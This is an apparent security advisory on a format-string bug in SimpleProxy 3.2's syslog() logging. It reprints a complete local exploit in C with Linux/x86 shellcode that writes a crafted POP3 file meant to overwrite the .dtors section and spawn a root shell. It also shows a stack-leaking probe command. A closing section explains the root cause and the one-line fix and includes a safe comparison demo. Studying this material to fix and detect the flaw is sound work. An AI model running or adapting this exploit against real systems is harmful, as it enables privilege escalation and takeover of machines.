SimpleProxy Local Format String (Exploit)
Summary
"simpleproxy acts as a simple TCP proxy. It opens a listening socket on the local machine and forwards any connection to a remote host. It can be run as a daemon or through inetd."
Because user-provided data is passed to syslog() as the format argument rather than as a plain string, an attacker can supply a format string that writes to arbitrary memory and, in turn, executes arbitrary code.
Credit:
The information has been provided by Darkeagle.
The original article can be found at: http://exploiterz.org/simpleprx-exp.c
Details
Vulnerable Systems:
* SimpleProxy version 3.2
Exploit:
/*
 * SimpleProxy 3.2 local format string exploit
 * by Darkeagle
 *
 * syslog() function in simpleproxy.c
 *
 *++++++++++++++++++++++++++++++++++++++++
 * static void log(int type, char *format, ...)
 * {
 *     ...
 * #if HAVE_SYSLOG
 *     syslog(type,buffer);
 *     ...
 * }
 * static struct lst_record *load_pop3_list(const char *popfile)
 * {
 *     ...
 *     if(*str=='\0') continue;
 *     log(LOG_INFO,"Adding '%s' to POP3 users list",str);
 *     ...
 * }
 *++++++++++++++++++++++++++++++++++++++++
 *
 * Other vulnerable calls of the log() function exist as well, including a remote one.
 * One more local one is in the -P parameter:
 *
 * [darkeagle@localhost simpleproxy-3.2]$ ./simpleproxy -L 3337 -R localhost:110 -d -v -p1 -f sample.cfg -P AAAA%8$\x
 * [darkeagle@localhost simpleproxy-3.2]$ tail -2 /var/log/syslog
 * Aug 27 00:14:05 localhost simpleproxy[5755]: Can't open POP3 file: AAAA4141203a
 * Aug 27 00:14:05 localhost simpleproxy[5756]: Error binding socket.
 * [darkeagle@localhost simpleproxy-3.2]$
 *
 * Very easy to exploit.
 * To exploit simpleproxy, pass the value 'popa3d.txt' in the -P parameter.
 * The bug was corrected in the latest version (3.4).
 * Enough.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// We must begin !!!

/* split a 32-bit address into its four bytes, b0 being the most significant */
#define doit( b0, b1, b2, b3, addr ) { \
    b0 = (addr >> 24) & 0xff; \
    b1 = (addr >> 16) & 0xff; \
    b2 = (addr >> 8) & 0xff; \
    b3 = (addr ) & 0xff; \
}

/* Linux/x86 payload: setuid(0), execve("/bin//sh"), exit() */
char shellcode[] =
    "\x31\xc0"
    "\x31\xdb"
    "\x31\xc9"
    "\xb0\x46"
    "\xcd\x80"
    "\x31\xc0"
    "\x50"
    "\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e"
    "\x89\xe3"
    "\x8d\x54\x24\x08"
    "\x50"
    "\x53"
    "\x8d\x0c\x24"
    "\xb0\x0b"
    "\xcd\x80"
    "\x31\xc0"
    "\xb0\x01"
    "\xcd\x80";

/* builds the four "%<pad>x%<pos>$n" pairs that store retaddr one byte at a time */
char *
evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
    char * buf;
    unsigned char b0, b1, b2, b3;
    int start = 256;

    doit( b0, b1, b2, b3, retaddr );
    buf = (char *)malloc(999);
    memset( buf, 0, 999 );
    b3 -= figure;
    b2 -= figure;
    b1 -= figure;
    b0 -= figure;
    snprintf( buf, 999,
              "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
              b3 - (sizeof( size_t ) * 4) + start - base, offset,
              b2 - b3 + start, offset + 1,
              b1 - b2 + start, offset + 2,
              b0 - b1 + start, offset + 3 );
    return buf;
}

int
main( int argc, char * argv[] )
{
    char * fmt;
    char endian[555];
    unsigned long locaddr, retaddr;
    unsigned int offset, base;
    unsigned char b0, b1, b2, b3;
    FILE *file;

    memset( endian, 0, 555 );
    file = fopen("popa3d.txt", "w+");   /* the file later handed to simpleproxy via -P */
    if ( file == NULL ) {
        perror("popa3d.txt");
        return 1;
    }
    locaddr = 0x804ce20; // dtorz addrz :=)
    retaddr = 0xbfffec54; // shellcode addr
    offset = 5;
    locaddr += 0x4; // dtorz+0x4
    doit( b0, b1, b2, b3, locaddr );
    base = 4;

    /* four consecutive target addresses in little-endian byte order */
    snprintf( endian, sizeof(endian),
              "%c%c%c%c"
              "%c%c%c%c"
              "%c%c%c%c"
              "%c%c%c%c",
              b3, b2, b1, b0,
              b3 + 1, b2, b1, b0,
              b3 + 2, b2, b1, b0,
              b3 + 3, b2, b1, b0 );
    fmt = evil_builder( retaddr, offset, base, 0x4 );
    memset(fmt+strlen(fmt), 0x42, 48);   /* padding before the shellcode */
    strcat(fmt, shellcode);
    strcat(endian, fmt);
    fprintf(file, "%s", endian);
    fclose(file);
    return 0;
}
/* EoF */
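The root cause quoted in the exploit header is the call shape syslog(type, buffer), where buffer already holds user-controlled text. The following is an added example, not code from the advisory or from simpleproxy: it places a log() wrapper of that shape beside the corrected form, with syslog() replaced by a constructed in-memory stand-in (syslog_stub) so the two can be compared without writing to the system log, and adds a small audit helper (count_conversions) that counts the '%' conversions a string would trigger if it were ever used as a format. The names syslog_stub, log_vulnerable, log_fixed and count_conversions and the input strings are assumptions of this example; the vulnerable path is exercised only with a harmless "%%" so that the run is deterministic and shows the difference without undefined behaviour.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for syslog(): formats into a caller-supplied buffer
 * instead of the system log, so the two wrappers below can be compared. */
static void syslog_stub(char *out, size_t outlen, const char *format, ...)
{
    va_list ap;
    va_start(ap, format);
    vsnprintf(out, outlen, format, ap);
    va_end(ap);
}

/* Same shape as the simpleproxy log() quoted above: the message is formatted
 * once, then the RESULT is handed to the sink as its format string. Every '%'
 * that came from the caller's data is now parsed by the sink. */
void log_vulnerable(char *out, size_t outlen, const char *format, ...)
{
    char buffer[256];
    va_list ap;

    va_start(ap, format);
    vsnprintf(buffer, sizeof buffer, format, ap);
    va_end(ap);

    syslog_stub(out, outlen, buffer);          /* bug: buffer used as the format */
}

/* Fixed form: a constant format; the message travels as a plain argument. */
void log_fixed(char *out, size_t outlen, const char *format, ...)
{
    char buffer[256];
    va_list ap;

    va_start(ap, format);
    vsnprintf(buffer, sizeof buffer, format, ap);
    va_end(ap);

    syslog_stub(out, outlen, "%s", buffer);   /* message is data, never format */
}

/* Audit helper: number of '%' conversions a string would trigger if it were
 * used as a format. "%%" is a literal percent sign and is not counted. */
int count_conversions(const char *s)
{
    int n = 0;
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] != '%')
            continue;
        if (s[i + 1] == '%') {
            i++;             /* skip the escaped pair */
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    char out[256];
    /* Constructed attacker-controlled value, as a POP3 file name given via -P. */
    const char *user = "100%% done";

    log_vulnerable(out, sizeof out, "Can't open POP3 file: %s", user);
    printf("vulnerable: %s\n", out);   /* "%%" collapsed to "%": the sink parsed it */
    log_fixed(out, sizeof out, "Can't open POP3 file: %s", user);
    printf("fixed:      %s\n", out);   /* "%%" preserved: the sink saw plain data */
    printf("conversions in \"AAAA%%8$x\": %d\n", count_conversions("AAAA%8$x"));
    return 0;
}
```

The same one-line fix applies to the real code: syslog(type, "%s", buffer) instead of syslog(type, buffer). Because glibc declares syslog() with a printf-style format attribute, building with gcc's -Wformat-security reports the original call shape, which makes this class of bug cheap to catch in review and CI.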